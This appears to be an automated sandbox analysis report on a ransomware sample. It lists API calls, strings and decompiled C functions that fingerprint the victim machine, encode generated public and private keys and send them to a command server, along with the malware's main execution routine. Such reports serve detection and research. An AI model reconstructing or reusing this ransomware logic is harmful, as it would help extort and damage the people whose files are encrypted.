0x00000000
0x00000000
0x00000000
0x0f694f4d
0x00000000
0x0f694f47
0x00000000
0x0f694f38
0x00000000
0x0f694f54
0x0f694f54
0x0f694f57
0x0f694f58
0x0f694f59
0x0f694f5d
0x00000000
0x0f694f28
0x0f694f22
0x0f694ecb
0x0f694ecb
0x0f694ecf
0x0f694f05
0x0f694f19
0x0f694ed1
0x0f694ed3
0x0f694ed5
0x0f694ed5
0x0f694ed9
0x0f694ef7
0x0f694efa
0x00000000
0x00000000
0x00000000
0x00000000
0x0f694edb
0x0f694ee0
0x0f694ee0
0x0f694ee4
0x00000000
0x00000000
0x0f694eed
0x0f694eef
0x00000000
0x0f694ef1
0x0f694ef1
0x0f694ef5
0x00000000
0x00000000
0x00000000
0x00000000
0x0f694ef5
0x00000000
0x0f694eef
0x00000000
0x0f694ee0
0x00000000
0x0f694efc
0x0f694efc
0x0f694eff
0x0f694f00
0x0f694f01
0x00000000
0x0f694ed5
0x0f694ecf
0x00000000

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,0F6951ED), ref: 0F694F0D
lstrlenA.KERNEL32(00000000,?,0F6951ED), ref: 0F694F67
lstrcpyA.KERNEL32(?,?,?,0F6951ED), ref: 0F694F98

Strings

fabian wosar <3, xrefs: 0F694F05

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: cd502dcb0e85ade502dc08fd0a28fc80ff56e38955aabe3f45518173c4ab52cd
Instruction ID: ab1dd722f1c8969c0b8b0ea6b7f416da4a90737ce8e1bef11da8c94f1188a8ec
Opcode Fuzzy Hash: cd502dcb0e85ade502dc08fd0a28fc80ff56e38955aabe3f45518173c4ab52cd
Instruction Fuzzy Hash: E231E32180C2A75ADF26CE6854143FABFAEEFC3155B98D2C9D8D58B307DE615447C390

Uniqueness

Uniqueness Score: -1.00%

Function 0F693190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F693190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

0x0f693193
0x0f693197
0x0f69319c
0x0f6931b0
0x0f6931b9
0x0f6931ce
0x0f6931d1
0x0f6931d9
0x0f6931e1
0x0f6931e4
0x0f6931e9
0x0f6931a0
0x0f6931a0
0x0f6931a0
0x0f6931a4
0x00000000
0x00000000
0x0f6931a8
0x0f6931ec
0x00000000
0x0f6931aa
0x0f6931aa
0x0f6931ae
0x00000000
0x00000000
0x00000000
0x00000000
0x0f6931ae
0x00000000
0x0f6931a8
0x0f6931f5
0x0f6931f5
0x00000000

APIs

lstrcmpiA.KERNEL32(0F695444,mask,0F695445,?,?,0F693441,0F695445,00000000,00000000,00000000,?,?,0F695444,00000000), ref: 0F6931B9
lstrcmpiA.KERNEL32(0F695444,pub_key,?,0F693441,0F695445,00000000,00000000,00000000,?,?,0F695444,00000000), ref: 0F6931D1

Strings

pub_key, xrefs: 0F6931BF
mask, xrefs: 0F6931B1

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: 6ade09136f04bf152270aa60deeaa2080e933402a2918781ecf94a8161d92780
Instruction ID: cd9ce9fb444b6e9aef91839fe4c80a092e08b2c96217d08099f962f10b59a4d5
Opcode Fuzzy Hash: 6ade09136f04bf152270aa60deeaa2080e933402a2918781ecf94a8161d92780
Instruction Fuzzy Hash: 4CF0F67230C2841EEF294EA89C467A1BBDDDB45311F94057EE689C6362C6AA98818364

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wzltxa.exePID: 1276, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	20.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	719
Total number of Limit Nodes:	11

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0FBB5860 Relevance: 109.0, APIs: 55, Strings: 7, Instructions: 458
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0FBB5860(CHAR* __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v148;
				char _v152;
				void* _v156;
				int _v160;
				int _v164;
				CHAR* _v172;
				int _v176;
				CHAR* _v184;
				int _v192;
				void* _v196;
				CHAR* _v200;
				CHAR* _v204;
				WCHAR* _v208;
				void* _v212;
				void* _v216;
				signed int _v220;
				short* _v224;
				void* _v228;
				void* _v232;
				void* _v236;
				CHAR* _v240;
				CHAR* _v268;
				void* __esi;
				CHAR* _t134;
				void* _t136;
				int _t146;
				void* _t149;
				int _t150;
				signed int _t151;
				void* _t153;
				int _t159;
				signed int _t167;
				signed int _t171;
				CHAR* _t178;
				int _t179;
				CHAR* _t182;
				void* _t191;
				long _t195;
				void _t210;
				int _t211;
				intOrPtr _t215;
				int _t216;
				char _t217;
				long _t226;
				int _t239;
				char* _t240;
				void* _t244;
				void* _t245;
				void* _t248;
				long _t250;
				signed int _t254;
				CHAR* _t256;
				int _t259;
				int _t260;
				void* _t261;
				void* _t266;
				CHAR* _t267;
				void* _t270;
				CHAR* _t273;
				long _t276;
				CHAR* _t277;
				char* _t279;
				signed int _t282;
				int _t283;
				long _t286;
				void* _t287;
				void* _t288;
				WCHAR* _t289;
				WCHAR* _t290;
				void* _t291;
				WCHAR* _t292;
				WCHAR* _t294;
				int _t297;
				long _t298;
				void* _t299;
				CHAR* _t300;
				int _t302;
				signed int _t303;
				void* _t307;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v184 = __ecx;
				_v160 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_t307 = (_t303 & 0xfffffff8) - 0x9c;
				_push(1);
				_push(__ecx);
				_push(1);
				E0FBB3BC0( &_v148);
				E0FBB7490( &_v236, __edx); // executed
				_t266 = E0FBB72A0( &_v236);
				_t282 = _a8 + __edx;
				_t7 = _t282 + 8; // 0x8
				_t226 = _t266 + _t7 * 8 << 3;
				_t134 = VirtualAlloc(0, _t226, 0x3000, 0x40); // executed
				_t259 = 0;
				_v240 = _t134;
				_v268 = _t134;
				_t239 = 0x30 + (_t266 + _t282 * 4) * 8;
				if(_t134 == 0 || _t239 >= _t226) {
					_v176 = _t259;
					_t267 = _t134;
				} else {
					_t267 = _t239 + _t134;
					_v176 = _t134;
					_v184 = _t267;
					_t259 = _t239;
				}
				_t136 = 2 + _a8 * 8;
				if(_v156 == 0) {
					L7:
					_t240 = 0;
					_v172 = 0;
				} else {
					_t302 = _t259 + _t136;
					if(_t302 >= _t226) {
						goto L7;
					} else {
						_t240 = _t267;
						_v172 = _t267;
						_t267 =  &(_t267[_t136]);
						_t259 = _t302;
						_v184 = _t267;
					}
				}
				_t283 = _v164;
				if(_v156 == 0 || 2 + _t283 * 8 + _t259 >= _t226) {
					_t267 = 0;
					_v184 = 0;
				}
				if(_t240 == 0) {
					L58:
					VirtualFree(_v156, 0, 0x8000);
					E0FBB7D70( &_v152);
					return 1;
				} else {
					_t260 = _a8;
					_v160 = _t260 + _t260;
					CryptBinaryToStringA(_a4, _t260, 0x40000001, _t240,  &_v160);
					_v176 = _t283 + _t283;
					CryptBinaryToStringA(_v204, _t283, 0x40000001, _t267,  &_v176);
					_t146 = lstrlenA(_t267);
					_t286 = _t146 + lstrlenA(_v204) + 0x42;
					_t149 = VirtualAlloc(0, _t286, 0x3000, 0x40); // executed
					_v196 = _t149;
					_v200 = _t149;
					_v220 = 0;
					_t150 = lstrlenA(_v204);
					_t261 = _v196;
					_t151 = _t150 + 1;
					if(_t261 == 0 || _t151 >= _t286) {
						_v212 = 0;
					} else {
						_v220 = _t151;
						_v200 = _t261 + _t151;
						_v212 = _t261;
					}
					_t153 = lstrlenA(_t267) + 1;
					if(_v196 == 0 || _t153 + _v220 >= _t286) {
						_v200 = 0;
					}
					_t287 = 0;
					if(lstrlenA(_v204) != 0) {
						_t279 = _v212;
						do {
							_t256 = _v204;
							_t217 =  *((intOrPtr*)(_t287 + _t256));
							if(_t217 != 0xa && _t217 != 0xd) {
								 *_t279 = _t217;
								_t279 = _t279 + 1;
							}
							_t287 = _t287 + 1;
						} while (_t287 < lstrlenA(_t256));
						_t267 = _v216;
					}
					_t288 = 0;
					if(lstrlenA(_t267) != 0) {
						_t254 = _v200;
						_v220 = _t254;
						do {
							_t215 =  *((intOrPtr*)(_t288 + _t267));
							if(_t215 != 0xa && _t215 != 0xd) {
								 *_t254 = _t215;
								_v220 = _t254 + 1;
							}
							_t288 = _t288 + 1;
							_t216 = lstrlenA(_t267);
							_t254 = _v220;
						} while (_t288 < _t216);
					}
					_t289 = _v208;
					lstrcatW(_t289, L"action=call&");
					_t290 =  &(_t289[lstrlenW(_t289)]);
					_v216 = _t290;
					E0FBB70A0( &_v184, _t290); // executed
					_v224 = 0;
					_v208 = 0;
					_t159 = E0FBB35C0( &_v224,  &_v208); // executed
					if(_t159 == 0) {
						ExitProcess(_t159); // executed
					}
					lstrcatW(_t290, L"&id=");
					_t270 = _v220;
					lstrcatW(_t290, _t270);
					lstrcatW(_t290, L"&subid=");
					_t291 = _v204;
					lstrcatW(_v216, _t291);
					VirtualFree(_t270, 0, 0x8000);
					VirtualFree(_t291, 0, 0x8000);
					_t292 = _v216;
					lstrcatW(_t292, L"&pub_key=");
					_t167 = lstrlenW(_t292);
					MultiByteToWideChar(0xfde9, 0, _v212, 0xffffffff,  &(_t292[_t167]), lstrlenA(_v212));
					_t294 = _v216;
					lstrcatW(_t294, L"&priv_key=");
					_t171 = lstrlenW(_t294);
					_t273 = _v200;
					MultiByteToWideChar(0xfde9, 0, _t273, 0xffffffff,  &(_t294[_t171]), lstrlenA(_t273));
					lstrcatW(_v216, L"&version=2.3.1r");
					_t276 = (lstrlenW(_v208) << 4) + 0x12;
					_v216 = VirtualAlloc(0, _t276, 0x3000, 0x40);
					_t244 = 2 + lstrlenW(_v208) * 8;
					_t178 = _v216;
					if(_t178 == 0 || _t244 >= _t276) {
						_t277 = 0;
					} else {
						_t277 = _t178;
					}
					_t179 = lstrlenW(_v208);
					_t245 =  *0xfbc2a78; // 0x0
					_v220 = _t179;
					if(_t245 != 0) {
						VirtualFree(_t245, 0, 0x8000);
					}
					_t182 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
					 *0xfbc2a78 = _t182;
					if(_t182 != 0) {
						wsprintfA(_t182, "%S", L"popkadurak");
						_t307 = _t307 + 0xc;
					}
					_t297 = _v220 + _v220;
					E0FBB5F00(_v208, _t297, _t297);
					_v192 = _v220 * 8;
					if(CryptBinaryToStringA(_v208, _t297, 0x40000001, _t277,  &_v192) == 0) {
						GetLastError();
					}
					_t104 = lstrlenA(_t277) + 2; // 0x2
					_t298 = _t104;
					_v228 = VirtualAlloc(0, _t298, 0x3000, 0x40);
					_t106 = lstrlenA(_t277) + 1; // 0x1
					_t248 = _t106;
					_t191 = _v228;
					if(_t191 == 0) {
						L46:
						_v216 = 0;
					} else {
						_v216 = _t191;
						if(_t248 >= _t298) {
							goto L46;
						}
					}
					_t299 = 0;
					if(lstrlenA(_t277) != 0) {
						_v236 = _v216;
						do {
							_t210 =  *((intOrPtr*)(_t299 + _t277));
							if(_t210 != 0xa && _t210 != 0xd) {
								 *_t248 = _t210;
								_v236 = _t248 + 1;
							}
							_t299 = _t299 + 1;
							_t211 = lstrlenA(_t277);
							_t248 = _v236;
						} while (_t299 < _t211);
					}
					_t300 = _v216;
					MultiByteToWideChar(0xfde9, 0, _t300, 0xffffffff, _v224, lstrlenA(_t300));
					_v236 = 0;
					_t195 = E0FBB54F0(_t300,  &_v236, _t248, 1);
					if(_t195 != 0) {
						_t250 = _v236;
						if(_t250 != 0) {
							 *_a12 = _t250;
						}
						VirtualFree(_v228, 0, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						goto L58;
					} else {
						VirtualFree(_v228, _t195, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						VirtualFree(_v204, 0, 0x8000);
						E0FBB7D70( &_v200);
						return 0;
					}
				}
			}

0x0fbb586f
0x0fbb5870
0x0fbb5872
0x0fbb5873
0x0fbb5878
0x0fbb587e
0x0fbb5882
0x0fbb5884
0x0fbb5885
0x0fbb5887
0x0fbb5888
0x0fbb588a
0x0fbb588b
0x0fbb588d
0x0fbb588e
0x0fbb5890
0x0fbb5893
0x0fbb5895
0x0fbb5896
0x0fbb589f
0x0fbb58a8
0x0fbb58b9
0x0fbb58bb
0x0fbb58c4
0x0fbb58ca
0x0fbb58d0
0x0fbb58d6
0x0fbb58d8
0x0fbb58dc
0x0fbb58e3
0x0fbb58ec
0x0fbb5901
0x0fbb5905
0x0fbb58f2
0x0fbb58f2
0x0fbb58f5
0x0fbb58f9
0x0fbb58fd
0x0fbb58fd
0x0fbb590f
0x0fbb5916
0x0fbb592f
0x0fbb592f
0x0fbb5931
0x0fbb5918
0x0fbb5918
0x0fbb591d
0x00000000
0x0fbb591f
0x0fbb591f
0x0fbb5921
0x0fbb5925
0x0fbb5927
0x0fbb5929
0x0fbb5929
0x0fbb591d
0x0fbb593a
0x0fbb593e
0x0fbb594d
0x0fbb594f
0x0fbb594f
0x0fbb595b
0x0fbb5d98
0x0fbb5da3
0x0fbb5da9
0x0fbb5db9
0x0fbb5961
0x0fbb5961
0x0fbb596d
0x0fbb5980
0x0fbb5985
0x0fbb5999
0x0fbb59a2
0x0fbb59b6
0x0fbb59bb
0x0fbb59c5
0x0fbb59c9
0x0fbb59cd
0x0fbb59d5
0x0fbb59d7
0x0fbb59db
0x0fbb59de
0x0fbb59f5
0x0fbb59e4
0x0fbb59e7
0x0fbb59eb
0x0fbb59ef
0x0fbb59ef
0x0fbb5a00
0x0fbb5a06
0x0fbb5a10
0x0fbb5a10
0x0fbb5a1c
0x0fbb5a22
0x0fbb5a24
0x0fbb5a30
0x0fbb5a30
0x0fbb5a34
0x0fbb5a39
0x0fbb5a3f
0x0fbb5a41
0x0fbb5a41
0x0fbb5a43
0x0fbb5a46
0x0fbb5a4a
0x0fbb5a4a
0x0fbb5a4f
0x0fbb5a55
0x0fbb5a57
0x0fbb5a5b
0x0fbb5a60
0x0fbb5a60
0x0fbb5a65
0x0fbb5a6b
0x0fbb5a6e
0x0fbb5a6e
0x0fbb5a73
0x0fbb5a74
0x0fbb5a76
0x0fbb5a7a
0x0fbb5a60
0x0fbb5a7e
0x0fbb5a8e
0x0fbb5a9b
0x0fbb5a9f
0x0fbb5aa3
0x0fbb5aac
0x0fbb5ab8
0x0fbb5ac0
0x0fbb5ac7
0x0fbb5aca
0x0fbb5aca
0x0fbb5ad6
0x0fbb5ad8
0x0fbb5ade
0x0fbb5aea
0x0fbb5af0
0x0fbb5af9
0x0fbb5b0d
0x0fbb5b17
0x0fbb5b19
0x0fbb5b23
0x0fbb5b30
0x0fbb5b4a
0x0fbb5b50
0x0fbb5b5a
0x0fbb5b61
0x0fbb5b63
0x0fbb5b79
0x0fbb5b88
0x0fbb5ba6
0x0fbb5bb6
0x0fbb5bbc
0x0fbb5bc3
0x0fbb5bc9
0x0fbb5bd3
0x0fbb5bcf
0x0fbb5bcf
0x0fbb5bcf
0x0fbb5bd9
0x0fbb5bdb
0x0fbb5be1
0x0fbb5be7
0x0fbb5bf1
0x0fbb5bf1
0x0fbb5c0b
0x0fbb5c11
0x0fbb5c18
0x0fbb5c25
0x0fbb5c2b
0x0fbb5c2b
0x0fbb5c36
0x0fbb5c3b
0x0fbb5c4b
0x0fbb5c67
0x0fbb5c69
0x0fbb5c69
0x0fbb5c79
0x0fbb5c79
0x0fbb5c86
0x0fbb5c8c
0x0fbb5c8c
0x0fbb5c8f
0x0fbb5c95
0x0fbb5c9f
0x0fbb5c9f
0x0fbb5c97
0x0fbb5c97
0x0fbb5c9d
0x00000000
0x00000000
0x0fbb5c9d
0x0fbb5ca8
0x0fbb5cae
0x0fbb5cb4
0x0fbb5cb8
0x0fbb5cb8
0x0fbb5cbd
0x0fbb5cc3
0x0fbb5cc6
0x0fbb5cc6
0x0fbb5ccb
0x0fbb5ccc
0x0fbb5cce
0x0fbb5cd2
0x0fbb5cb8
0x0fbb5cd6
0x0fbb5cec
0x0fbb5cf9
0x0fbb5d03
0x0fbb5d0d
0x0fbb5d5c
0x0fbb5d62
0x0fbb5d67
0x0fbb5d67
0x0fbb5d7b
0x0fbb5d89
0x0fbb5d96
0x00000000
0x0fbb5d0f
0x0fbb5d20
0x0fbb5d2e
0x0fbb5d3b
0x0fbb5d48
0x0fbb5d4e
0x0fbb5d5b
0x0fbb5d5b
0x0fbb5d0d

APIs

Part of subcall function 0FBB3BC0: GetProcessHeap.KERNEL32(?,?,0FBB4807,00000000,?,00000000,00000000), ref: 0FBB3C5C

Part of subcall function 0FBB7490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FBB74B7
Part of subcall function 0FBB7490: GetUserNameW.ADVAPI32 ref: 0FBB74C8
Part of subcall function 0FBB7490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FBB74E6
Part of subcall function 0FBB7490: GetComputerNameW.KERNEL32 ref: 0FBB74F0
Part of subcall function 0FBB7490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBB7510
Part of subcall function 0FBB7490: wsprintfW.USER32 ref: 0FBB7551
Part of subcall function 0FBB7490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBB756E
Part of subcall function 0FBB7490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBB7592
Part of subcall function 0FBB7490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FBB4810,?), ref: 0FBB75B6
Part of subcall function 0FBB7490: RegCloseKey.KERNEL32(00000000), ref: 0FBB75D2

Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72F2
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72FD
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7313
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB731E
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7334
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB733F
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7355
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(0FBB4B36,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7360
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7376
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7381
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7397
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73A2
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73C1
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73CC

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0FBB58D0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0FBB5980
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0FBB5999
lstrlenA.KERNEL32(00000000), ref: 0FBB59A2
lstrlenA.KERNEL32(?), ref: 0FBB59AA
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0FBB59BB
lstrlenA.KERNEL32(?), ref: 0FBB59D5
lstrlenA.KERNEL32(00000000), ref: 0FBB59FE
lstrlenA.KERNEL32(?), ref: 0FBB5A1E

Strings

action=call&, xrefs: 0FBB5A88
&pub_key=, xrefs: 0FBB5B1D
&priv_key=, xrefs: 0FBB5B54
&subid=, xrefs: 0FBB5AE4
&version=2.3.1r, xrefs: 0FBB5B7F
popkadurak, xrefs: 0FBB5BFE, 0FBB5C1A
&id=, xrefs: 0FBB5AD0

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$BinaryCryptNameString$CloseComputerHeapOpenProcessQueryUserValuewsprintf
String ID: &id=$&priv_key=$&pub_key=$&subid=$&version=2.3.1r$action=call&$popkadurak
API String ID: 1618292170-4215222798
Opcode ID: 6890bc7a92fff22d230b799e71524527335342f9df8839286ec33029f3c9b32e
Instruction ID: d844ee7975951089f6a574294b886051ca4264f036a0260fc46416c2d67805ba
Opcode Fuzzy Hash: 6890bc7a92fff22d230b799e71524527335342f9df8839286ec33029f3c9b32e
Instruction Fuzzy Hash: 92F1AD71608301AFD720DF25EC85BABBBA9EF88710F44091CF585A7291DBB4E9058F66

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB4B20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182
threadsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				void* _t55;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0FBB47D0(_t90, _t106); // executed
				if(_t54 == 0) {
					_t55 = CreateThread(0, 0, E0FBB2D30, 0, 0, 0); // executed
					_v8 = _t55;
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8); // executed
					}
					E0FBB48C0(); // executed
					E0FBB42B0(_t90, _t106); // executed
					E0FBB6550( &_v80); // executed
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0FBB6500( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0FBB4B00(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0FBB5860(_v28, _v44, _v40, _v36,  &_v16); // executed
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0FBB64C0( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0FBB4200();
							InitializeCriticalSection(0xfbc2a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0FBB3FF0( &_v80);
							} else {
								E0FBB41D0(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xfbc2a48);
							__eflags = E0FBB3C70();
							if(__eflags != 0) {
								E0FBB45B0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0FBB3DB0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xfbc2a44;
							if( *0xfbc2a44 != 0) {
								_t97 =  *0xfbc2a44; // 0x2bf0000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0FBB3DB0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0);
			}

0x0fbb4b2b
0x0fbb4b31
0x0fbb4b38
0x0fbb4b51
0x0fbb4b57
0x0fbb4b5e
0x0fbb4b74
0x0fbb4b78
0x0fbb4b7c
0x0fbb4b7c
0x0fbb4b82
0x0fbb4b86
0x0fbb4b86
0x0fbb4b8c
0x0fbb4b91
0x0fbb4b99
0x0fbb4b9e
0x0fbb4ba5
0x0fbb4bac
0x0fbb4bb3
0x0fbb4bcd
0x0fbb4bd2
0x0fbb4bd9
0x0fbb4bea
0x0fbb4c3b
0x0fbb4c53
0x0fbb4c58
0x0fbb4c5d
0x0fbb4c6c
0x0fbb4c5f
0x0fbb4c64
0x0fbb4c64
0x0fbb4c73
0x0fbb4c78
0x0fbb4c7d
0x0fbb4c84
0x0fbb4c8b
0x0fbb4c92
0x0fbb4c99
0x0fbb4c9d
0x0fbb4cef
0x0fbb4cef
0x0fbb4cf9
0x0fbb4cff
0x0fbb4d03
0x0fbb4d15
0x0fbb4d05
0x0fbb4d0b
0x0fbb4d0b
0x0fbb4d1f
0x0fbb4d2a
0x0fbb4d2c
0x0fbb4d2e
0x0fbb4d2e
0x0fbb4d47
0x0fbb4d4a
0x0fbb4d4e
0x0fbb4d5b
0x0fbb4d64
0x0fbb4d74
0x0fbb4d74
0x0fbb4d7a
0x0fbb4d81
0x0fbb4d89
0x0fbb4d97
0x0fbb4d97
0x0fbb4d9f
0x0fbb4d9f
0x0fbb4ca9
0x0fbb4cbf
0x0fbb4cd6
0x0fbb4cdc
0x0fbb4cde
0x0fbb4ce8
0x00000000
0x0fbb4ce8
0x0fbb4ce2
0x0fbb4bec
0x0fbb4c00
0x0fbb4c03
0x0fbb4c07
0x0fbb4c14
0x0fbb4c1d
0x0fbb4c2d
0x0fbb4c2d
0x0fbb4c35
0x0fbb4c35
0x0fbb4bea
0x0fbb4b3c

APIs

Sleep.KERNEL32(000003E8), ref: 0FBB4B2B

